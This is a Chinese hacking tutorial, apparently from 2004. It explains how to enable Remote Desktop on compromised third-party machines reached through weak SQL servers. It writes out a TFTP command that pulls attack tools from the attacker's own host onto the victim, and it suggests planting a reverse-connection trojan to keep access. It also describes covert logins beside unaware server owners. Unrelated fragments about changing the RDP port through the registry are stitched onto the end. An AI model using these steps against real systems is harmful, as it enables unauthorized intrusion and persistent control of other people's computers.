怎么用DOS开3389?

命令查明系统版本，只有2000和XP系统才有可能开3389服务，而常见的2000和XP系统的版本有：
Microsoft Windows XP Home Edition 家庭版
Microsoft Windows XP Professional专业版
Microsoft Windows 2000 Professional专业版
Microsoft Windows 2000 Server 服务版
新手千万记住了,在以上版本中,只有2000服务版和XP专业版才有可能开启3389服务
然后(哈哈哈,还有然后)再输入query user命令检查是否安装有终端服务组件,如果没有安装终端服务组件,仍然不能开3389,当然,XP系统的专业版就不用检查了
在2000系统服务器版本输入query user命令后,如果提示你"''query'' 不是内部或外部命令，也不是可运行的程序或批处理文件",则表明没有安装终端服务组件,反之则安装了服务组件,可以进行开3389的行动了
看看上面的内容是不是很复杂总结一下就清楚了:XP系统专业版可以开3389服务,2000系统服务版有终端组件的(多数有这个组件)可以开3389服务,其他系统都不能
在未得到高手七武器（QQ357337）指导之前TTY是不管肉鸡是什么系统就胡乱去开3389，所以总是失败。知道了开3389的必要条件后，TTY才发现，在所扫描到的SQL肉鸡里，专业版的XP系统比较多，容易找到，而2000服务版的肉鸡很少，不容易找到。但XP系统开的3389几乎没有实用价值，因为很容易被对方主人发现，登陆上去不到几秒钟就会被对方踢下来。
2000服务版本的3389肉鸡多数是无人值守的服务器，即使是有人在上面，你用3389登陆后对方也看不到，这点我和七武器（QQ357337）做过实验，我们俩用同一个帐号同一时刻登陆一台土耳其的3389服务器，各开各的窗口、各运行各的程序互相不影响，也互相看不见，通过query user命令发现，对方主人也在服务器上面。
废话少说，现在我们来对2000服务系统和XP系统的肉鸡开3389吧。XP系统的3389虽然没有实用价值，但这类系统的肉鸡容易扫描到，作为练习也是不错的。
开XP系统3389服务所用的软件是xp3389exe,用SQL连接器连接上肉鸡后,通过TFTP或FTP手段将xp3389exe上传到对方系统目录下,一般是c:\windows\system32\,然后直接运行xp3389exe即可,对方系统不重新启动就可以用3389登陆了
开2000系统3389服务所用的软件是3389exe,用SQL连接器连接上肉鸡后,通过TFTP或FTP手段将xp3389exe上传到对方任何目录下,直接运行3389exe,运行成功后对方计算机要重新启动,待对方重新启动并连接上网后就可以通过3389登陆了
有的网友会问,如果对方是动态IP,重新启动后不就找不到对方计算机了吗根据TTY很少的实践经验,安装2000服务版系统的计算机多数是固定IP,重新启动后依然能找到的,如果实在担心的话,可以先传一个反d端口类型的木马上去,这样就万无一失了
这里有两个基本手段可能要说明一下,即用SQL连接器连接上肉鸡后,怎样通过TFTP或FTP手段将文件xp3389exe,3389exe,或木马等等上传到对方计算机上
使用TFTP方法上传文件到肉鸡的条件是你必须是外网,局域网内的计算机不能使用首先下载软件TFTP服务器tftpd32j,解压缩后运行tftpd32exe该软件虽然是英文界面,但使用很简单的,在server interface处选择外网IP(注意,虚拟拨号的网友一般会出现两个IP,你必须正确选择连接internet的IP),接着点击Browse选择你的计算机上3389exe或其他你要上传的文件所在的目录就OK了
现在打开SQL连接器连接上肉鸡,如果你要将3389exe文件传到肉鸡的D盘上,你就输入以下命令:
tftp -i 219141105106 get 3389exe d:\3389exe
其中219141105106就是你的IP地址,回车后你就会看到tftpd32exe界面出现上传文件的进度条,上传完毕,用
dir d:\
命令看看文件是否在肉鸡的D盘上
关于利用FTP上传文件到肉鸡的方法,本人在2003年8月20日 到8月22日更新手记里的<简单玩玩SQL漏洞入侵>文章里已经有了详细的叙述,感兴趣的网友可以去看看,这里就不重复了。
附：高手七武器（QQ357337）看到此文后从QQ上给TTY发来了补充消息：
(2004-04-13 20:22:52) ★七武器★
老T，在你主页的更新手记里说到的“只有2000和XP才能开3389”，应该还有2003也可以，还有NT的TermService版的也可以，还有2000的版本还有一个是：Microsoft Windows 2000 Advanced Server （2000高级服务器版本）也可以开3389。 用type c:\bootini可以查看系统版本，如果它的系统版本不在C盘，那么要相应修改盘符。可以用set来查看系统盘是在哪个盘。

你是指用网站域名连接还是直接是ip连接 或者是指这网站服务器开启远程连接的方法？ 前者的话开启3389功能直接用域名跟ip都可以直接连接 后者的话需要登录服务器在里面开启3389功能

注册表有2个地方需要修改：
第一处：
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值，默认是3389，修改成所希望的端口，比如1314
第二处：
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]　
PortNumber值，默认是3389，修改成所希望的端口，比如1314
完后重启服务器 OK！！

---